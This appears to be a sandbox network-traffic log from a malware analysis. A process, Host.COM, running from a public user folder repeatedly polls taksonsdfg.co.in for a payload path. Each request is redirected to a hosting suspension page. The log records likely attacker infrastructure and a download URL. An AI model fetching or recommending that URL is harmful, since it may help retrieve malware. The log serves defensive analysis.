2024-11-26 08:38:18 UTC	771	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49722	108.170.55.202	443	8004	C:\Users\Public\Libraries\Host.COM

Timestamp	Bytes transferred	Direction	Data
2024-11-26 08:38:19 UTC	175	OUT	GET /cgi-sys/suspendedpage.cgi HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 08:38:20 UTC	325	IN	HTTP/1.1 200 OK Connection: close content-type: text/html transfer-encoding: chunked date: Tue, 26 Nov 2024 08:38:20 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 08:38:20 UTC	1043	IN	Data Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
2024-11-26 08:38:20 UTC	6588	IN	Data Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
2024-11-26 08:38:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49730	108.170.55.202	443	8004	C:\Users\Public\Libraries\Host.COM

Timestamp	Bytes transferred	Direction	Data
2024-11-26 08:38:22 UTC	179	OUT	GET /MIEJOHNSONERE/190_Ovqqzpvffya HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 08:38:22 UTC	446	IN	HTTP/1.1 302 Found Connection: close content-type: text/html content-length: 771 date: Tue, 26 Nov 2024 08:38:22 GMT server: LiteSpeed cache-control: no-cache, no-store, must-revalidate, max-age=0 location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 08:38:22 UTC	771	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49737	108.170.55.202	443	8004	C:\Users\Public\Libraries\Host.COM

Timestamp	Bytes transferred	Direction	Data
2024-11-26 08:38:24 UTC	175	OUT	GET /cgi-sys/suspendedpage.cgi HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 08:38:24 UTC	325	IN	HTTP/1.1 200 OK Connection: close content-type: text/html transfer-encoding: chunked date: Tue, 26 Nov 2024 08:38:24 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 08:38:24 UTC	1043	IN	Data Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
2024-11-26 08:38:24 UTC	6588	IN	Data Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
2024-11-26 08:38:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49746	108.170.55.202	443	8004	C:\Users\Public\Libraries\Host.COM

Timestamp	Bytes transferred	Direction	Data
2024-11-26 08:38:26 UTC	179	OUT	GET /MIEJOHNSONERE/190_Ovqqzpvffya HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 08:38:27 UTC	446	IN	HTTP/1.1 302 Found Connection: close content-type: text/html content-length: 771 date: Tue, 26 Nov 2024 08:38:27 GMT server: LiteSpeed cache-control: no-cache, no-store, must-revalidate, max-age=0 location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 08:38:27 UTC	771	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49752	108.170.55.202	443	8004	C:\Users\Public\Libraries\Host.COM

Timestamp	Bytes transferred	Direction	Data
2024-11-26 08:38:28 UTC	175	OUT	GET /cgi-sys/suspendedpage.cgi HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 08:38:29 UTC	325	IN	HTTP/1.1 200 OK Connection: close content-type: text/html transfer-encoding: chunked date: Tue, 26 Nov 2024 08:38:29 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 08:38:29 UTC	1043	IN	Data Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
2024-11-26 08:38:29 UTC	6588	IN	Data Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
2024-11-26 08:38:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49759	108.170.55.202	443	8004	C:\Users\Public\Libraries\Host.COM

Timestamp	Bytes transferred	Direction	Data
2024-11-26 08:38:31 UTC	179	OUT	GET /MIEJOHNSONERE/190_Ovqqzpvffya HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 08:38:31 UTC	446	IN	HTTP/1.1 302 Found Connection: close content-type: text/html content-length: 771 date: Tue, 26 Nov 2024 08:38:31 GMT server: LiteSpeed cache-control: no-cache, no-store, must-revalidate, max-age=0 location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 08:38:31 UTC	771	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	49765	108.170.55.202	443	8004	C:\Users\Public\Libraries\Host.COM

Timestamp	Bytes transferred	Direction	Data
2024-11-26 08:38:33 UTC	175	OUT	GET /cgi-sys/suspendedpage.cgi HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 08:38:33 UTC	325	IN	HTTP/1.1 200 OK Connection: close content-type: text/html transfer-encoding: chunked date: Tue, 26 Nov 2024 08:38:33 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 08:38:33 UTC	1043	IN	Data Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
2024-11-26 08:38:33 UTC	6588	IN	Data Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
2024-11-26 08:38:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.7	49772	108.170.55.202	443	8004	C:\Users\Public\Libraries\Host.COM

Timestamp	Bytes transferred	Direction	Data
2024-11-26 08:38:35 UTC	179	OUT	GET /MIEJOHNSONERE/190_Ovqqzpvffya HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 08:38:35 UTC	446	IN	HTTP/1.1 302 Found Connection: close content-type: text/html content-length: 771 date: Tue, 26 Nov 2024 08:38:35 GMT server: LiteSpeed cache-control: no-cache, no-store, must-revalidate, max-age=0 location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 08:38:35 UTC	771	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.7	49776	108.170.55.202	443	8004	C:\Users\Public\Libraries\Host.COM

Timestamp	Bytes transferred	Direction	Data
2024-11-26 08:38:37 UTC	175	OUT	GET /cgi-sys/suspendedpage.cgi HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 08:38:37 UTC	325	IN	HTTP/1.1 200 OK Connection: close content-type: text/html transfer-encoding: chunked date: Tue, 26 Nov 2024 08:38:37 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 08:38:37 UTC	1043	IN	Data Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
2024-11-26 08:38:37 UTC	6588	IN	Data Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } 